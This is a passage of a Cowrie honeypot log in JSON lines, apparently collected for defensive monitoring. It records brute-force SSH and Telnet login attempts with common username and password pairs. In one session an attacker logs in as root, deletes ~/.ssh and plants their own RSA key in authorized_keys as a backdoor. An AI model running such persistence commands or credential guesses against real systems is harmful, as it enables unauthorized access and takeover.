sh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:38:41.523709Z","src_ip":"212.227.235.229","session":"0a38e5a11992"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:38:41.958779Z","src_ip":"212.227.235.229","session":"0a38e5a11992"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:38:42.619712Z","src_ip":"212.227.235.229","session":"3c773bc0c482"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:38:43.058799Z","src_ip":"212.227.235.229","session":"0a38e5a11992"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39808,"dst_ip":"1.2.3.4","dst_port":22,"session":"4854a8b3d546","protocol":"ssh","message":"New connection: 212.227.235.229:39808 (1.2.3.4:22) [session: 4854a8b3d546]","sensor":"my-vps","timestamp":"2025-09-08T22:38:43.156463Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:38:43.157387Z","src_ip":"212.227.235.229","session":"4854a8b3d546"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:38:43.254559Z","src_ip":"212.227.235.229","session":"4854a8b3d546"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:38:43.683483Z","src_ip":"212.227.235.229","session":"4854a8b3d546"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:38:43.782109Z","src_ip":"212.227.235.229","session":"4854a8b3d546"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:38:43.783161Z","src_ip":"212.227.235.229","session":"13c3d07eb5ef"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54466,"dst_ip":"1.2.3.4","dst_port":22,"session":"71c0323fc563","protocol":"ssh","message":"New connection: 212.227.235.229:54466 (1.2.3.4:22) [session: 71c0323fc563]","sensor":"my-vps","timestamp":"2025-09-08T22:38:56.011658Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:38:56.012637Z","src_ip":"212.227.235.229","session":"71c0323fc563"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:38:56.323520Z","src_ip":"212.227.235.229","session":"71c0323fc563"}
{"eventid":"cowrie.login.failed","username":"tester","password":"P@ssw0rd","message":"login attempt [tester/P@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-09-08T22:38:57.610612Z","src_ip":"212.227.235.229","session":"71c0323fc563"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:38:58.924365Z","src_ip":"212.227.235.229","session":"71c0323fc563"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60032,"dst_ip":"1.2.3.4","dst_port":22,"session":"e4e2cb654dca","protocol":"ssh","message":"New connection: 212.227.235.229:60032 (1.2.3.4:22) [session: e4e2cb654dca]","sensor":"my-vps","timestamp":"2025-09-08T22:39:16.010293Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:39:16.035435Z","src_ip":"212.227.235.229","session":"e4e2cb654dca"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:39:16.272681Z","src_ip":"212.227.235.229","session":"e4e2cb654dca"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"Welcome1","message":"login attempt [postgres/Welcome1] failed","sensor":"my-vps","timestamp":"2025-09-08T22:39:17.270317Z","src_ip":"212.227.235.229","session":"e4e2cb654dca"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:39:18.521174Z","src_ip":"212.227.235.229","session":"e4e2cb654dca"}
{"eventid":"cowrie.session.connect","src_ip":"71.6.232.23","src_port":48794,"dst_ip":"1.2.3.4","dst_port":23,"session":"4bbf62f8e4c3","protocol":"telnet","message":"New connection: 71.6.232.23:48794 (1.2.3.4:23) [session: 4bbf62f8e4c3]","sensor":"my-vps","timestamp":"2025-09-08T22:39:26.450782Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49490,"dst_ip":"1.2.3.4","dst_port":22,"session":"38ed43955404","protocol":"ssh","message":"New connection: 212.227.235.229:49490 (1.2.3.4:22) [session: 38ed43955404]","sensor":"my-vps","timestamp":"2025-09-08T22:39:34.257913Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:39:34.259061Z","src_ip":"212.227.235.229","session":"38ed43955404"}
{"eventid":"cowrie.session.closed","duration":7.829827547073364,"message":"Connection lost after 7 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:39:34.280536Z","src_ip":"71.6.232.23","session":"4bbf62f8e4c3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:39:34.584369Z","src_ip":"212.227.235.229","session":"38ed43955404"}
{"eventid":"cowrie.login.failed","username":"debian","password":"password123","message":"login attempt [debian/password123] failed","sensor":"my-vps","timestamp":"2025-09-08T22:39:35.927715Z","src_ip":"212.227.235.229","session":"38ed43955404"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:39:37.256074Z","src_ip":"212.227.235.229","session":"38ed43955404"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48830,"dst_ip":"1.2.3.4","dst_port":22,"session":"19c987c43d54","protocol":"ssh","message":"New connection: 212.227.235.229:48830 (1.2.3.4:22) [session: 19c987c43d54]","sensor":"my-vps","timestamp":"2025-09-08T22:39:41.103062Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:39:41.104169Z","src_ip":"212.227.235.229","session":"19c987c43d54"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:39:41.204392Z","src_ip":"212.227.235.229","session":"19c987c43d54"}
{"eventid":"cowrie.login.failed","username":"test3","password":"test3123","message":"login attempt [test3/test3123] failed","sensor":"my-vps","timestamp":"2025-09-08T22:39:41.645531Z","src_ip":"212.227.235.229","session":"19c987c43d54"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:39:42.747538Z","src_ip":"212.227.235.229","session":"19c987c43d54"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36194,"dst_ip":"1.2.3.4","dst_port":22,"session":"3103bb9a7b3b","protocol":"ssh","message":"New connection: 212.227.235.229:36194 (1.2.3.4:22) [session: 3103bb9a7b3b]","sensor":"my-vps","timestamp":"2025-09-08T22:39:52.275488Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:39:52.276706Z","src_ip":"212.227.235.229","session":"3103bb9a7b3b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:39:52.510289Z","src_ip":"212.227.235.229","session":"3103bb9a7b3b"}
{"eventid":"cowrie.login.failed","username":"rocky","password":"Password1","message":"login attempt [rocky/Password1] failed","sensor":"my-vps","timestamp":"2025-09-08T22:39:53.484943Z","src_ip":"212.227.235.229","session":"3103bb9a7b3b"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:39:54.722166Z","src_ip":"212.227.235.229","session":"3103bb9a7b3b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56568,"dst_ip":"1.2.3.4","dst_port":22,"session":"d00ce6647cee","protocol":"ssh","message":"New connection: 212.227.235.229:56568 (1.2.3.4:22) [session: d00ce6647cee]","sensor":"my-vps","timestamp":"2025-09-08T22:39:56.015063Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:39:56.016360Z","src_ip":"212.227.235.229","session":"d00ce6647cee"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52392,"dst_ip":"1.2.3.4","dst_port":22,"session":"9aa9db274c1c","protocol":"ssh","message":"New connection: 212.227.235.229:52392 (1.2.3.4:22) [session: 9aa9db274c1c]","sensor":"my-vps","timestamp":"2025-09-08T22:40:16.722459Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:40:16.723689Z","src_ip":"212.227.235.229","session":"9aa9db274c1c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:40:17.032805Z","src_ip":"212.227.235.229","session":"9aa9db274c1c"}
{"eventid":"cowrie.login.success","username":"root","password":"1qazxsw@","message":"login attempt [root/1qazxsw@] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:40:18.312688Z","src_ip":"212.227.235.229","session":"9aa9db274c1c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:40:18.991503Z","src_ip":"212.227.235.229","session":"9aa9db274c1c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:40:18.992309Z","src_ip":"212.227.235.229","session":"9aa9db274c1c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:40:18.993379Z","src_ip":"212.227.235.229","session":"9aa9db274c1c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:40:19.304138Z","src_ip":"212.227.235.229","session":"9aa9db274c1c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:40:19.985489Z","src_ip":"212.227.235.229","session":"9aa9db274c1c"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:40:19.986203Z","src_ip":"212.227.235.229","session":"9aa9db274c1c"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:40:20.297595Z","src_ip":"212.227.235.229","session":"9aa9db274c1c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:40:20.298841Z","src_ip":"212.227.235.229","session":"9aa9db274c1c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53738,"dst_ip":"1.2.3.4","dst_port":22,"session":"18fd550ad520","protocol":"ssh","message":"New connection: 212.227.235.229:53738 (1.2.3.4:22) [session: 18fd550ad520]","sensor":"my-vps","timestamp":"2025-09-08T22:40:20.608633Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:40:20.609326Z","src_ip":"212.227.235.229","session":"18fd550ad520"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:40:20.919947Z","src_ip":"212.227.235.229","session":"18fd550ad520"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":32994,"dst_ip":"1.2.3.4","dst_port":23,"session":"79c88b7fdea5","protocol":"telnet","message":"New connection: 212.227.125.160:32994 (1.2.3.4:23) [session: 79c88b7fdea5]","sensor":"my-vps","timestamp":"2025-09-08T22:40:21.383215Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:40:21.468412Z","src_ip":"212.227.125.160","session":"79c88b7fdea5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:40:21.490210Z","src_ip":"212.227.125.160","session":"79c88b7fdea5"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:40:22.204497Z","src_ip":"212.227.235.229","session":"18fd550ad520"}
